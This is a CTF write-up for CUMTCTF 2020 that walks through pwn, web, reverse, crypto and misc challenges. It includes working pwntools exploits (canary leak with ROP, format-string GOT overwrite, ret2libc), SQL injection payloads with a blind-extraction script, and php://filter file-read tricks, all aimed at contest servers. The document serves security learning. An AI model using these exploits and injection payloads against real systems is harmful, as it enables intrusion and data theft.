Pwn
canary
泄露canary,system('sh')
from pwn import *
from LibcSearcher import *
#sh = process("./canary")
# Remote instance of the challenge (the local process() run is kept above).
sh = remote("202.119.201.197","10004")
# Step 1: fill the 56-byte buffer and read back the 8 bytes that follow the
# echoed padding.  Presumably sendline's trailing '\n' landed on the canary's
# low 0x00 byte, which is why 0xa is subtracted -- that zero byte exists so
# string functions stop before the canary; echoing the buffer back is what
# defeats it here.  TODO confirm against the binary.
payload = 56 * 'a'
sh.sendline(payload)
sh.recvuntil(56 * 'a')
ca = u64(sh.recv(8)) - 0xa
#log.info("Canary:"+hex(ca))
# Fixed addresses for this binary (presumably non-PIE; the LibcSearcher
# variant below was not needed and is left commented out).
rdi_addr = 0x4008e3    # gadget used to load rdi -- confirm in the binary
shell_addr = 0x400726  # unused below
# start_main = 0x601040
# libc = LibcSearcher("__libc_start_main",start_main)
# base = start_main - libc.dump("__libc_start_main")
# binsh_addr = base + libc.dump("str_bin_sh")
# sys_addr = base + libc.dump("system")
sh_addr = 0x400904     # address of the "sh" string named in the title line
sys_addr = 0x4005F0    # system -- presumably its PLT entry
# Step 2: 56 filler bytes, the leaked canary, 8 more filler bytes (saved rbp,
# presumably), then the return chain rdi_addr -> sh_addr -> sys_addr.
payload = 56 * b"\x90" + p64(ca) + 8 * b"\x90" + p64(rdi_addr) + p64(sh_addr) + p64(sys_addr)
#ayload = flat([56*'a',ca,8*'a'])
sh.send(payload)
sh.interactive()
fmstr
formatstr写got表
from pwn import *
# Local run of the binary.  fmtstr_payload builds the format-string write:
# parameter offset 10, value 8 stored at 0x0804A068 (presumably a GOT entry,
# as the section title says the GOT is written -- verify).
sh = process("./cg")
sh.sendline("nidie")  # first input; presumably consumed before the vulnerable printf -- verify
payload = fmtstr_payload(10, {0x0804A068:8})
sh.sendline(payload)
sh.interactive()
babyrop
手动泄露libc
from pwn import *
from LibcSearcher import *
#sh = process('./rop')
sh = remote("202.119.201.197","10001")
elf = ELF("./rop")
puts_plt = elf.plt['puts']
libc_start_main_got = elf.got['__libc_start_main']
main_addr = 0x0804854E  # hard-coded main of the (presumably non-PIE) 32-bit binary -- confirm
# Stage 1: 112 bytes of filler, then puts(GOT[__libc_start_main]) with main as
# puts' return address so a second overflow is possible afterwards.
# NOTE(review): str + bytes concatenation only works under Python 2 pwntools;
# on Python 3 this line raises TypeError.
payload = (112) * 'a' + p32(puts_plt) + p32(main_addr) + p32(libc_start_main_got)
sh.recvuntil("say:")
sh.send(payload)
start_addr = u32(sh.recv()[0:4])  # first 4 bytes of puts' output: the leaked libc address
# Resolve the libc build from the leak (LibcSearcher is third-party) and
# compute system / "/bin/sh" from the base.
libc = LibcSearcher("__libc_start_main",start_addr)
base = start_addr - libc.dump("__libc_start_main")
sys_addr = base + libc.dump('system')
binsh_addr = base + libc.dump('str_bin_sh')
# Stage 2: same filler, then system(binsh_addr) with 0xdeadbeef as the
# dummy return address.
payload = 112 * 'a' + p32(sys_addr) + p32(0xdeadbeef) +p32(binsh_addr)
sh.send(payload)
sh.interactive()
Web
Secret
下载图片,winHex打开,最后面有源码,get两个参数 一个用数据流伪协议 data://传入Suvin_wants_a_girlfriend
另外一个param2参数在需要一个数值范围内,post两个参数,值不相等,sha1值相等,百度到两个pdf,前几百字符符合绕过条件url编码后上传得到flag
import requests
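s=requests.Session()
# GET parameters: param1 through the data: stream wrapper, param2 a number in
# the expected range.  The "&param2" separator had been mangled into "¶m2"
# (the HTML entity for "&para") when the write-up was copied; restored here.
url='http://202.119.201.197:13005/index.php?param1=data:text/plain,Suvin_wants_a_girlfriend&param2=0x278d01'
header = {
    'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36"',
}
# POST body: two different URL-encoded PDF prefixes with the same SHA-1 digest,
# which satisfies a "values differ but sha1() matches" check.  Equality of
# SHA-1 digests is no proof of equal content; such a check needs a
# collision-resistant hash (SHA-256 or better).
payload={'param1':'%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1',
'param2':'%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1'
}
a=s.post(url,data=payload,headers=header).content
content=str(a,encoding="utf-8")
#if len(content)>2359:
# print(i)
print(content)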
简单的文件包含
首先尝试XFF=127.0.0.1失败,最后添加了头client-ip=127.0.0.1 ,得到源码,需要绕过require_once,函数解析软链接时存在问题,无法多次解析绝对路径,用伪协议php://filter读取文件,多次重复/proc/self/root/路径最后解析为var/www/html/flag.php,post参数f得到flag
Web签到
http://202.119.201.197:13001/?1=1&file=php://filter/read/convert.base64-encode/resource=flag.php
post data:
2=2
Babysqli
username=1&password=1'/**/union/**/select/**/1,2,3,4,5,6,7,8/**/#
回显第四列
username=1&password=1'/**/union/**/select/**/1,2,3,database(),5,6,7,8/**/#
cumtctf
username=1&password=1'/**/union/**/select/**/1,2,3,database(),5,6,7,8/**/#
emails,users
username=1&password=1'/**/union/**/select/**/1,2,3,group_concat(column_name),5,6,7,8/**/from/**/information_schema.columns/**/where/**/table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login
username=1&password=1'/**/union/**/select/**/1,2,3,concat_ws(user_id,first_name,last_name,user,password,avatar,last_login,failed_login),5,6,7,8/**/from/**/cumtctf.users/**/limit/**/7,1#
Hack8Me8Hacker8CUMTCTF{27ec8034-c9fe-0cfd-d92a-84362ecf0e42}8{$avatarUrl}1337.jpg82020-09-21 13:21:0380
Babysqli2
以前好像做过类似的题,反斜线转义单引号
import requests
import time
# Boolean-based blind extraction of cumtctf.users, row by row and character
# by character.  The backslash sent as `username` escapes the quote that
# closes the username literal (see the note above), so the `password` value
# is evaluated as SQL.  Parameterised queries, not hand-rolled quote escaping,
# are the fix for this class of bug.
url = 'http://202.119.201.197:13004/'
ans = ''     # unused
rowlen = 0   # length of the current row, found by the first inner loop
for row in range(0, 10000):
    # NOTE: `len` shadows the builtin for the rest of the script (harmless
    # here because len() is never called).
    for len in range(0, 100): # get len
        data = {
            'username': '\\',
            'password': '/**/or/**/(if((select/**/length(concat_ws(id,username,password))/**/from/**/cumtctf.users/**/limit/**/%i,1)>%i,1,0))#' % (row, len)
        }
        res = requests.post(url=url, data=data)
        # 'Wrong username' in the reply means the injected condition was
        # false, i.e. the row's length is not greater than `len`.
        if 'Wrong username' in res.text:
            print("row " + str(row) + '\'s length is: ' + str(len))
            print('now row' + str(row) + '-----')
            rowlen = len
            break
    words = ''
    for j in range(1, rowlen + 1): # get words
        low = 32    # printable ASCII, inclusive ...
        high = 126  # ... exclusive: '~' (126) itself is never tried
        for word in range(low, high):
            data = {
                'username': '\\',
                'password': '/**/or/**/(if(ord(right(left((select/**/concat_ws(id,username,password)/**/from/**/cumtctf.users/**/limit/**/%i,1),%i),1))=%i,1,0))#' % (row, j, word)
            }
            res = requests.post(url=url, data=data)
            # Absence of 'Wrong username' means the j-th character matched.
            if 'Wrong username' not in res.text:
                words += chr(word)
                print("now words is: " + words)
                break
Re
Re1
拖入PEID无壳,IDA打开,shift+F12直接查看字符串,得到解。
Re2
UPX -d + IDA + SHIFT+F12。
Re3
生成了一个长度为29的cipher数组,输入flag后,比较是否是29位。后面是一个循环,将Flag[i]与19异或,若与cipher[i]相同,则正确。
Re4
# Expected bytes the binary compares against; per the Re3 description each one
# is the flag character XOR-ed with 19, so XOR-ing with 19 again recovers it.
cipher = [
    80, 70, 94, 71, 80, 71, 85, 104, 86, 39,
    64, 106, 76, 67, 106, 71, 123, 92, 125, 76,
    37, 106, 103, 118, 80, 35, 119, 32, 110,
]
XOR_KEY = 19
flag = ''.join(chr(value ^ XOR_KEY) for value in cipher)
print(flag)
Re4
IDA打开,发现是输入flag,经过加密,和结果比较。 eMl1_l1hT9_ldcoR3OC1CW0HhC_{UF30Tp__l}。
这结果就是flag的换位操作。输入一串字符串,并且再OD里查找到其换位的情况,就能反向推出Flag了。
输入:ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-=
# The binary only permutes its input: feeding it `before` produced `after`,
# so the position of each character of `before` inside `after` tells where
# the matching flag character sits in the encrypted string.
before = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-='
after = 'VCKWTLRID1Z7S0YQJ8-XEOMU4A3HBG5PF2N96='
flag_encrpyt = 'eMl1_l1hT9_ldcoR3OC1CW0HhC_{UF30Tp__l}'
flag = ''.join(
    flag_encrpyt[pos]
    for ch in before
    for pos, moved in enumerate(after)
    if moved == ch
)
print(flag)
Re5
.NET文件,用dnspy打开,选择ACM阵营(太菜了TAT)。很快找到加密逻辑。
一开始用Z3列方程解,发现没法解,有模运算。
后来依据模的性质,直接将方程展开,组成矩阵求解。
根据hint去找了个带快速幂的脚本,用来解矩阵。
因为要输入好多次,修改下脚本,直接输入。
#include<cstdio>
#define maxn 110
#define r register
using namespace std;
typedef long long ll;
// Elimination state: n = number of unknowns, p = modulus, maxi = row chosen
// when a zero pivot has to be swapped away.
int n,p,maxi;
// tmp: swap scratch; ans[]: solved unknowns (1-based); a[][]: augmented
// matrix, rows 1..n and columns 1..n+1 (column n+1 is the right-hand side).
ll tmp,ans[maxn],a[maxn][maxn];
// Per-equation multiplier k; main() fills a[i][j] = key[i-1]^(41-j) mod p.
int key[41] ={
233,
136,
189,
132,
157,
100,
196,
185,
138,
222,
90,
101,
115,
229,
161,
97,
135,
122,
127,
230,
143,
203,
137,
119,
80,
141,
227,
156,
178,
105,
133,
194,
184,
179,
159,
220,
111,
177,
145,
200,
181};
// Right-hand side of each equation; main() copies it into column 42.
int sum[41] = {
46384,
31562,
39797,
36757,
62393,
15780,
41763,
29976,
5998,
4308,
40650,
45891,
6897,
54534,
14623,
49558,
23530,
37973,
3560,
18854,
47021,
52794,
16283,
28942,
33213,
25540,
62337,
7253,
14550,
60109,
25945,
26838,
55988,
46800,
47119,
44280,
58951,
62100,
59760,
25395,
16590
};
// Read a non-negative decimal integer from stdin, skipping any leading
// non-digit characters.  No sign handling, no overflow check; unused by the
// current main(), which hard-codes its input.
int read()
{
    int ch = getchar();
    while (ch < '0' || ch > '9') {
        ch = getchar();
    }
    int value = 0;
    while (ch >= '0' && ch <= '9') {
        value = value * 10 + (ch - '0');
        ch = getchar();
    }
    return value;
}
// Fast modular exponentiation: x^y mod p, with p the global modulus.
// Recurses on y/2, squares the result and multiplies by x once more when y
// is odd.  Intermediate products stay below p*p*x, which fits in long long
// for the values main() passes (x < p, p = 65537).
ll ksm(ll x, int y)
{
    if (y == 0) {
        return 1;
    }
    ll half = ksm(x, y >> 1);
    ll squared = half * half % p;
    if (y & 1) {
        return squared * x % p;
    }
    return squared;
}
int main()
{
    // Solve the 41 equations sum[i] = sum_j flag[j] * key[i]^(41-j) (mod p)
    // for the 41 unknown flag bytes by Gaussian elimination over GF(p).
    //sum[0] = flag[i]*(k^(j-i)) ...... flag[41]*(k^(1))
    // Indices start at 1.
    /*n=read(),p=read();
    for(r int i=1;i<=n;i++)
    for(r int j=1;j<=n+1;j++)
    a[i][j]=read();*/
    n = 41 ; // 41 unknowns
    p = 65537; // p is the modulus (prime, so the Fermat inverses below are valid)
    // Coefficient matrix: a[i][j] = key[i-1]^(41-j) mod p, i = row (1..41),
    // j = column (1..41).
    for(r int i=1;i<=n;i++)
        for(r int j=1;j<=n;j++)
            a[i][j]=ksm(key[i-1],40-j+1);
    // Augment with the right-hand side sum[] in column 42 (= n+1).
    for(int i =1;i<=41;i++){
        a[i][42]=sum[i-1];
    }
    // Forward elimination: reduce to upper-triangular form modulo p.
    for(r int i=1;i<=n;i++)
    {
        if(!a[i][i])// the pivot must not be 0: swap in a lower row with a non-zero entry
        {
            maxi=0;
            for(r int j=i+1;j<=n&&!maxi;j++)
                if(a[j][i]) maxi=j;
            if(!maxi) continue;// the whole column is 0, nothing to eliminate
            for(r int j=i;j<=n+1;j++)
                tmp=a[maxi][j],a[maxi][j]=a[i][j],a[i][j]=tmp;
        }
        for(r int j=i+1;j<=n;j++)
        {
            tmp=a[j][i];
            if(!tmp) continue;// already 0, nothing to eliminate
            // row_j = row_j * a[i][i] - row_i * tmp (mod p), kept non-negative
            for(r int k=i;k<=n+1;k++)
                a[j][k]=((a[j][k]*a[i][i]-a[i][k]*tmp)%p+p)%p;
        }
    }
    // Back substitution; ksm(a[i][i], p-2) is the modular inverse of the
    // pivot (Fermat's little theorem).
    for(r int i=n;i;i--)
    {
        for(r int j=i+1;j<=n;j++)
            a[i][n+1]=((a[i][n+1]-ans[j]*a[i][j])%p+p)%p;
        ans[i]=a[i][n+1]*ksm(a[i][i],p-2)%p;
    }
    // Print the recovered unknowns in order.
    for(r int i=1;i<=n;i++) printf("%lld ",ans[i]);
    return 0;
}
Re6
先读懂七夕算法。这题给了加密后的Jpg图片,与加密用的脚本。逆出加密逻辑就行了。IDA打开exe文件。找到加密函数,因为太大,无法F5。直接看汇编。
进入encrypt()函数。
只能一步步跟了,大概分析出前几个逻辑之后。分析出规律,并且每次得到的新变量都会放进[ebp+var10]处,直接x跟踪这个变量,就能在上下文中快速得到剩下的加密逻辑。
最后总结得到总的加密逻辑,是七夕算法稍稍改变。
a=(x<<12h)^x
b=(a<<1Ch)^a
c=(b>>2h)^b
d = (c>>9)^c
e = (d>>16h)^d
f = (e<<8)^e
g = (f>>12h)^f
h = (g<<1Bh)^g
i = (h<<4)^h
j = (i<<12h)^i
k = (j<<10h)^j
l = (k>>0Ah)^k
m = (l>>0Bh)^l
n = (m>>19h)^m
o = (n>>0Fh)^n
// 在带佬的文件加密算法中修改一下就好了。
/* Inverse of the 15-round shift/xor cipher listed above (rounds a..o).
 * Each round v' = (v << s) ^ v or v' = (v >> s) ^ v is undone with the
 * matching leftShiftXor / rightShiftXor helper (defined elsewhere; assumed
 * to invert exactly those two forms), applied in reverse round order with
 * the same shift width (0Fh = 15, 19h = 25, 0Bh = 11, ...).
 */
unsigned int decrypt(unsigned int z){
    unsigned int v = z;
    v = rightShiftXor(v, 15);  /* undo o = (n >> 0Fh) ^ n */
    v = rightShiftXor(v, 25);  /* undo n = (m >> 19h) ^ m */
    v = rightShiftXor(v, 11);  /* undo m = (l >> 0Bh) ^ l */
    v = rightShiftXor(v, 10);  /* undo l = (k >> 0Ah) ^ k */
    v = leftShiftXor(v, 16);   /* undo k = (j << 10h) ^ j */
    v = leftShiftXor(v, 18);   /* undo j = (i << 12h) ^ i */
    v = leftShiftXor(v, 4);    /* undo i = (h << 4) ^ h */
    v = leftShiftXor(v, 27);   /* undo h = (g << 1Bh) ^ g */
    v = rightShiftXor(v, 18);  /* undo g = (f >> 12h) ^ f */
    v = leftShiftXor(v, 8);    /* undo f = (e << 8) ^ e */
    v = rightShiftXor(v, 22);  /* undo e = (d >> 16h) ^ d */
    v = rightShiftXor(v, 9);   /* undo d = (c >> 9) ^ c */
    v = rightShiftXor(v, 2);   /* undo c = (b >> 2h) ^ b */
    v = leftShiftXor(v, 28);   /* undo b = (a << 1Ch) ^ a */
    v = leftShiftXor(v, 18);   /* undo a = (x << 12h) ^ x */
    return v;
}
Crypto
幼儿园的密码题
分解n
小学生的密码题
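#c = [21,8841,841,884,21,884,42,888888821,8881,88888421,88888841,888421,88881,8888882,888841,888421,882,888881,8888421,88888,8888884,888888841]
# Cipher text: groups made of the digits 8/4/2/1, separated by '0'.  The digit
# sum of each group is a 1-based index into the alphabet 'A'..'}' (ASCII 65..125).
c = "2108841084108840210884042088888882108881088888421088888841088842108888108888882088884108884210882088888108888421088888088888840888888841"
dic = [chr(i) for i in range(ord("A"), ord("}") + 1)]
# Only these digits carry weight; any other non-'0' character is ignored,
# exactly as the original if-chain did.
digit_value = {'8': 8, '4': 4, '2': 2, '1': 1}
flag = []
print(len(c))
ans = 0
for ch in c:
    if ch == '0':
        flag.append(ans)
        ans = 0
    else:
        ans += digit_value.get(ch, 0)
# The cipher text does not end in '0', so the last group has to be flushed
# explicitly -- without this the final character ('}') was dropped.
if ans:
    flag.append(ans)
print(flag)
x = ''.join(dic[i - 1] for i in flag)
print(x)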
初中生的密码题
构造z3方程解除p,q,取绝对值转成正数。
维也纳的秘密
Wiener's attack
我只吃素
转为十六进制,再转字节流继续素数进制转换
36进制以下用python自带int(a,n)模块,之后用进制表转换
# with open('10.txt', 'r') as f:
# a=f.read()
# b=int(a,37)
# c = str(bytes.fromhex(hex(b)[2:]))
# with open('11.txt', 'w') as f:
# f.write(c)
# print(c)
# a = 53774449144672072651983634999671257979028588739250085327427356842712128211693421006687459464296243751556246647104051338954036978334150758486798783752000076286724674301629980950557216155876376289491412124652632403402402370503151966644377052977831198024219894816336334348407952187642977780265673369611181007658284747634523818825633001988566552637112354696755
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
# bb = 4ewx8C68op0f6pc51so1ABm9lgBce7n8mj2o3djj39pqg2m4zd5qessijlCEy2a6nEE68Azzkfyawf0k0a2k5p3fAndzwvq3zudewnxe9yviCjy1bf3vB0fzn4y7oDlmdzge0txueBf7C3que1n3
# a = 5233728613606375657976979928056020574196863114188155716918309649738148318536854787122881232353110295371937978401912391749326699926603517862001910055203420511693337124690962705924804069703297414559735308881968136915280669320608716232802884
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
# bb = 3prvE6r8jk8di37jGCfa4f2fCmb346lj4a51ymdqdk5hcCmGtB1th2l6zr2DGhgfv84Auq8kcckseCtq3e9vEsxdnkfg6aseGBD
# a = 43229137788244061542329848418700912953338168325804934916798790745654484584181753227393507557337247395185522499289482806852163725858927915419179194163003038581365
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
# a = 240601209018277235944025722380346889467221886496245930369392695432568925262249710088493177491025158020547047284
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
# a = 6071069041322015914824844158128867915719328949545468665089325844368923468715106
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
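a = 6289936645427058418849789859504444219159397
# Big-endian bytes of `a`.  bytes.fromhex() rejects an odd number of hex
# digits, so pad on the left; decode instead of str(), which would print the
# bytes *repr* ("b'...'") rather than the text itself.
hex_digits = format(a, "x")
if len(hex_digits) % 2:
    hex_digits = "0" + hex_digits
b = bytes.fromhex(hex_digits).decode("latin-1")
print(b)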
#H4ve_fun_with_base
#CUMTCTF{H4ve_fun_with_base}
#coding=gbk
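def f(nx,x1,x):
    """Convert the digit string ``nx`` from base ``x1`` to base ``x``.

    The digit alphabet is 0-9, a-z, A-Z (62 symbols, case-sensitive), so both
    bases must lie in 2..62.  Two diagnostic prints are kept for script
    compatibility: the input and both bases first, then the converted value.

    Args:
        nx: digit string in base ``x1`` (an int is str()-ed first).
        x1: base of ``nx``.
        x: target base.

    Returns:
        ``nx`` re-expressed in base ``x`` as a string of the same alphabet.

    Raises:
        ValueError: if a character of ``nx`` is not in the alphabet, or is
            not a valid digit for base ``x1`` (the original only printed a
            warning and silently returned a wrong result).
    """
    alphabet = ('0123456789'
                'abcdefghijklmnopqrstuvwxyz'
                'ABCDEFGHIJKLMNOPQRSTUVWXYZ')
    nx = str(nx)
    print(nx, "[", x1, "]==[", x, "] ", end='')
    # Base-x1 string -> integer by Horner's rule (most significant digit first).
    value = 0
    for ch in nx:
        idx = alphabet.index(ch)  # ValueError if ch is not a known digit
        if idx >= x1:
            raise ValueError("%r is not a valid base-%d digit" % (ch, x1))
        value = value * x1 + idx
    # Integer -> base-x string: least significant digit first, then reverse.
    # The do/while shape keeps the single '0' digit for value == 0.
    digits = []
    while True:
        value, rem = divmod(value, x)
        digits.append(alphabet[rem])
        if value == 0:
            break
    bd = ''.join(reversed(digits))
    print(bd)
    return bd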
# chun='zF4mOFpN7A'
# print (chun)
# print (f(chun[0:2],62,10)+f(chun[2:6],62,10)+f(chun[6:11],62,10))
# for i in range(0,62):
# f(str(i),10,62)
#F(str,str的进制,需要转换的进制)
# Challenge string in base 61, converted to decimal with f() above.
fl = 'SrUs8vUbLghjqO2fI4IvUgaN'
decimal_form = f(fl, 61, 10)
print(decimal_form)
Misc
真签到题
拖入010,找到base64,解码
兔兔那么可爱
# Read the challenge file as text: `a` is its content, `l` its length.
with open('flag', 'r') as flag_file:
    a = flag_file.read()
l = len(a)
def fib(n):
    """Yield the first ``n`` Fibonacci numbers starting at 1: 1, 2, 3, 5, 8, ..."""
    pair = (0, 1)
    remaining = n
    while remaining > 0:
        pair = (pair[1], pair[0] + pair[1])
        remaining -= 1
        yield pair[1]
# The first 100 Fibonacci numbers are 1-based positions into the file text;
# positions past the end of the file are skipped.
key = list(fib(100))
print(key)
flag = ''.join(a[position - 1] for position in key if position <= l)
print(flag)
#CUMTCTF{Are_rabbits_cute?}
大鲨鱼之你可劲找
打开追踪http流,发现为sql注入流量包,用脚本将sql语句和response导入文件发现为二分查找,每次以79开始,找每一个79之前的流量包,手工收集并转码,最后得到带分隔符的数字flag
别做题了听歌吧
先用audacity打开什么没有发现,尝试mp3stego,猜测密码为cumt,分离出带tab和和空格的txt,猜测为摩斯密码,写脚本tab转- 空格转. 换行转/解码得到flag
连签到都算不上
base64解码之后扫码,然后unicode解码,然后社会主义核心价值观解码
残缺的大鲨鱼
追踪TCP流可以发现某个TCP流中有传输的文件flag.zip
,选择显示和保存数据为原始数据保存流量,在winhex
中把开头的http
头部去掉,然后解压可以得到文件flag
根据hint可以发现flag文件是个反过来的jpg文件
# Per the hint the extracted file is the JPEG stored back-to-front; writing
# the bytes in reverse order restores it.
with open('./flag', 'rb') as reversed_file:
    content = reversed_file.read()
with open('./res.jpg', 'wb') as restored:
    restored.write(bytes(reversed(content)))
在winhex中可以发现文件末尾有zip文件的结尾,但是没有开始,不过可以发现hex值03 04 14 00
,修改一下前两个字节然后保存到新文件,解压即可得到bbxxss.txt,其中的codeemoji上次考过,code emoji解码即可
👾🐝🐁🐙👾🐙😸🚚🎂🏪💑🌋🍴🍖💪🎢🍖🍭🚄🏯🏯🚒😴🚣
You know what I mean?
官方题解:CUMTCTF2020官方题解